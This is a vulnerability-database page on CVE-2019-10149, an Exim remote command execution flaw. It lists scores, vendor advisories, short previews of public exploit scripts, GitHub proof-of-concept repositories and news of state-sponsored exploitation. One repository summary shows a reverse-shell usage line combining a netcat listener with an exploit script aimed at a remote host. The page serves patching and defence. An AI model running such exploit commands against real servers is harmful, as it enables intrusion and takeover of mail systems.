Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
1000
VMScore

CVE-2019-10149

Published: 05/06/2019 Updated: 07/11/2022
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Subscribe to Exim

Vulnerability Summary

It exists that Exim incorrectly handled certain decoding operations. A remote attacker could possibly use this issue to execute arbitrary commands.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

exim exim

debian debian linux 9.0

canonical ubuntu linux 18.04

canonical ubuntu linux 18.10

Vendor Advisories

Ubuntu Security Notice: exim4 vulnerability
Exim could be made to run commands if it received specially crafted network traffic ...
Debian Security Advisories: DSA-4456-1 exim4 -- security update
The Qualys Research Labs reported a flaw in Exim, a mail transport agent Improper validation of the recipient address in the deliver_message() function may result in the execution of arbitrary commands For the stable distribution (stretch), this problem has been fixed in version 489-2+deb9u4 We recommend that you upgrade your exim4 packages Fo ...
Amazon Linux AMI: ALAS-2019-1221
A flaw was found in Exim versions 487 to 491 before release 120 (inclusive) Improper validation of recipient address in deliver_message() function in /src/deliverc may lead to remote command execution (CVE-2019-10149) ...
Arch Linux Issues:
A flaw was found in the way exim validated recipient addresses A remote attacker could use this flaw to execute arbitrary commands on the exim server with the permissions of the user running the application ...

Exploits

Exploit DB: Exim 4.87 < 4.91 - (Local / Remote) Command Execution
Qualys Security Advisory The Return of the WIZard: RCE in Exim (CVE-2019-10149) ======================================================================== Contents ======================================================================== Summary Local exploitation Remote exploitation - Non-default configurations - Default configuration Acknowledgm ...
Exploit DB: Exim 4.87 - 4.91 - Local Privilege Escalation
#!/bin/bash # # raptor_exim_wiz - "The Return of the WIZard" LPE exploit # Copyright (c) 2019 Marco Ivaldi &lt;raptor@0xdeadbeefinfo&gt; # # A flaw was found in Exim versions 487 to 491 (inclusive) # Improper validation of recipient address in deliver_message() # function in /src/deliverc may lead to remote command execution # (CVE-2019-10 ...
Exploit DB: Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit)
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'expect' class MetasploitModule &lt; Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Li ...
Exploit DB: Exim 4.91 Local Privilege Escalation
This Metasploit module exploits a flaw in Exim versions 487 to 491 (inclusive) Improper validation of recipient address in deliver_message() function in /src/deliverc may lead to command execution with root privileges ...
Exploit DB: Exim 4.91 Local Privilege Escalation
Exim versions 487 through 491 suffer from a local privilege escalation vulnerability ...

Mailing Lists

Full Disclosure: Re: CVE-2019-10149: Exim 4.87 to 4.91: possible remote exploit
<!--X-Body-Begin--> <!--X-User-Header--> oss-sec mailing list archives <!--X-User-Header-End--> <!--X-TopPNI--> By Date By Thread </form> <!--X-TopPNI-End--> <!--X-MsgBody--> <!--X-Subject-Header-Begin--> Re: CVE-2019-10149: Exim 487 to 491: possible remote exploit <!--X-Subject-Header-End--> <!--X-Head-of-Message--> From: He ...
Full Disclosure: Re: CVE-2019-10149: Exim 4.87 to 4.91: possible remote exploit
<!--X-Body-Begin--> <!--X-User-Header--> oss-sec mailing list archives <!--X-User-Header-End--> <!--X-TopPNI--> By Date By Thread </form> <!--X-TopPNI-End--> <!--X-MsgBody--> <!--X-Subject-Header-Begin--> Re: CVE-2019-10149: Exim 487 to 491: possible remote exploit <!--X-Subject-Header-End--> <!--X-Head-of-Message--> From: So ...
Full Disclosure: Re: CVE-2019-10149: Exim 4.87 to 4.91: possible remote exploit
<!--X-Body-Begin--> <!--X-User-Header--> oss-sec mailing list archives <!--X-User-Header-End--> <!--X-TopPNI--> By Date By Thread </form> <!--X-TopPNI-End--> <!--X-MsgBody--> <!--X-Subject-Header-Begin--> Re: CVE-2019-10149: Exim 487 to 491: possible remote exploit <!--X-Subject-Header-End--> <!--X-Head-of-Message--> From: He ...

Github Repositories

https://github.com/area1/exim-cve-2019-10149-data

Data Collection Related to Exim CVE-2019-10149

Exim CVE Data Collection Data Collection Related to Exim Vulnerabilities CVE-2019-10149, CVE-2019-15846, CVE-2019-16928 CVE Announcement: cvemitreorg/cgi-bin/cvenamecgi?name=CVE-2019-10149 Exploit Details: wwwexploit-dbcom/exploits/46974 Issue Timeline: seclistsorg/fulldisclosure/2019/Jun/16 NSA Advisory: mediadefensegov/2020/May/28/2002

https://github.com/darsigovrustam/CVE-2019-10149

Instructions for installing a vulnerable version of Exim and its expluatation

CVE-2019-10149 - Exim 487 &lt; 491 Instructions for installing a vulnerable version of Exim and its expluatation Tested on Linux Ubuntu 1604, Exim 489 Exim installation Download and extract exim version 489 wget githubcom/Exim/exim/releases/download/exim-4_89/exim-489tarxz &amp;&amp; tar -xvf exim-489tarxz Move into the extracted folder cd exi

https://github.com/AzizMea/CVE-2019-10149-privilege-escalation

CVE-2019-10149 privilege escalation

CVE-2019-10149 privilege escalation "poc"

https://github.com/Dilshan-Eranda/CVE-2019-10149

SNP Assignment on a Linux vulnerability

CVE-2019-10149 SNP Assignment on a Linux vulnerability

https://github.com/aishee/CVE-2019-10149-quick

Simple Bash shell quick fix CVE-2019-10149

CVE-2019-10149-quick Simple Bash shell quick fix CVE-2019-10149

https://github.com/x418x/libaz

Libaz Recently someone used a known Exim exploit CVE-2019-10149 on a unpatched server We found out very fast due to Exim not being able to boot We secured as much of the trail as we could to maybe help you deal with this yourself The infection A infected email was sent to the server which performed a malicious download and install of a script We noticed an entry like this i

https://github.com/cowbe0x004/eximrce-CVE-2019-10149

simple python socket connection to test if exim is vulnerable to CVE-2019-10149. The payload simply touch a file in /tmp/eximrce.

eximrce Simple python socket connection to test if exim is vulnerable to CVE-2019-10149 The payload simply touch a file in /root/lweximtest Output will be slow depending on server's reply and not knowing how to properly use python's socket module Would love a lesson on how to speed it up Only tested on cPanel boxes Run locally on suspected server This checks for

https://github.com/MNEMO-CERT/PoC--CVE-2019-10149_Exim

PoC for CVE-2019-10149, this vulnerability could be xploited betwen 4-87 to 4.91 version of Exim server.

PoC-CVE-2019-10149_Exim MNEMO-CERT ha desarrollado una PoC que permite ejecutar comandos con permisos elevados mediante el aprovechamiento de la vulnerabilidad CVE-2019-10149, que afecta distintas versiones de Exim (487 - 491) Para realizar el aprovechamiento local de esta vulnerabilidad es necesario definir el comando que se desea ejecutar Por otro lado, para el caso remot

https://github.com/rahmadsandy/EXIM-4.87-CVE-2019-10149

EXIM-487-CVE-2019-10149 setup lab for educational purpose

https://github.com/dhn/exploits

Some personal exploits/pocs

Exploits Miscellaneous proof of concept exploit code for testing purposes Current Exploits Fortinet FortiOS 600 &lt;= 604, 560 &lt;= 568, 541 &lt;= 5410: The magic backdoor (CVE-2018-13382) Strato HiDrive &lt;= 5010 LPE (CVE-2019-9486) Exim 487 &lt; 491 LPE (CVE-2019-10149) ASUS Aura Sync &lt;= 10771 Stack-Based Buffer Overflow (CVE-

https://github.com/cowbe0x004/eximrce

simple python socket connection to test if exim is vulnerable to CVE-2019-10149. The payload simply touch a file in /tmp/eximrce.

eximrce Simple python socket connection to test if exim is vulnerable to CVE-2019-10149 The payload simply touch a file in /root/lweximtest Output will be slow depending on server's reply and not knowing how to properly use python's socket module Would love a lesson on how to speed it up Only tested on cPanel boxes Run locally on suspected server This checks for

https://github.com/hyim0810/CVE-2019-10149

CVE-2019-10149

CVE-2019-10149 - Exim 487 &lt; 491 Instructions for installing a vulnerable version of Exim and its expluatation Tested on Linux Ubuntu 1604, Exim 489 Exim installation Download and extract exim version 489 wget githubcom/Exim/exim/releases/download/exim-4_89/exim-489tarxz &amp;&amp; tar -xvf exim-489tarxz Move into the extracted folder cd exi

https://github.com/Diefunction/CVE-2019-10149

CVE-2019-10149 : A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.

CVE-2019-10149 CVE-2019-10149 : A flaw was found in Exim versions 487 to 491 (inclusive) Improper validation of recipient address in deliver_message() function in /src/deliverc may lead to remote command execution Example nc -lvp 9000 python /CVE-2019-10149/exploitpy --rhost examplecom --rport 25 --lhost 101010100 --lport 9000

https://github.com/Brets0150/StickyExim

Exim Honey Pot for CVE-2019-10149 exploit attempts.

StickyExim An Email HoneyPot Features Easy to deploy The install scripts does all the work Abuse report are atomaticlly created and sent to the attacking IP owner Abuse reports are stored with a hash at time of creation incase needed later Requirements Domain names One real domain you use for normal email Example: myrealdomaincom One domain for the HoneyPot(s) E

Recent Articles

APT trends report Q2 2020
Securelist • GReAT • 29 Jul 2020

For more than three years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of. This is our latest installment, focus...

Read more...
It's not every day the NSA publicly warns of attacks by Kremlin hackers – so take this critical Exim flaw seriously
The Register • Shaun Nichols in San Francisco • 29 May 2020

GRU crew actively exploit hole – but you patched it months ago, right? American intelligence follows British lead in warning of serious VPN vulnerabilities

The NSA has raised the alarm over what it says is Russia's active exploitation of a remote-code execution flaw in Exim for which a patch exists. The American surveillance super-agency said [PDF] on Thursday the Kremlin's military intelligence hackers are actively targeting some systems vulnerable to CVE-2019-10149, a security hole in the widely used Exim mail transfer agent (MTA) that was fixed last June. Here's a sample of Moscow's exploit code, according to the NSA, which is sent to a vulnerab...

Read more...

References

CWE-78https://www.exim.org/static/doc/security/CVE-2019-10149.txthttps://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10149https://usn.ubuntu.com/4010-1/http://www.openwall.com/lists/oss-security/2019/06/05/3http://www.openwall.com/lists/oss-security/2019/06/05/2http://www.openwall.com/lists/oss-security/2019/06/05/4https://www.debian.org/security/2019/dsa-4456https://seclists.org/bugtraq/2019/Jun/5https://security.gentoo.org/glsa/201906-01http://www.openwall.com/lists/oss-security/2019/06/06/1http://www.securityfocus.com/bid/108679http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00020.htmlhttp://packetstormsecurity.com/files/153218/Exim-4.9.1-Remote-Command-Execution.htmlhttp://seclists.org/fulldisclosure/2019/Jun/16http://packetstormsecurity.com/files/153312/Exim-4.91-Local-Privilege-Escalation.htmlhttp://www.openwall.com/lists/oss-security/2019/07/25/6http://www.openwall.com/lists/oss-security/2019/07/25/7http://www.openwall.com/lists/oss-security/2019/07/26/4http://packetstormsecurity.com/files/154198/Exim-4.91-Local-Privilege-Escalation.htmlhttp://www.openwall.com/lists/oss-security/2021/05/04/7https://usn.ubuntu.com/4010-1/https://nvd.nist.govhttps://www.exploit-db.com/exploits/46974
VMScore
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2024-32744privilege escalationCVE-2024-30253CVE-2024-3914cross-site scriptingCVE-2024-31497CVE-2024-3400CVE-2024-32341hardcoded
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook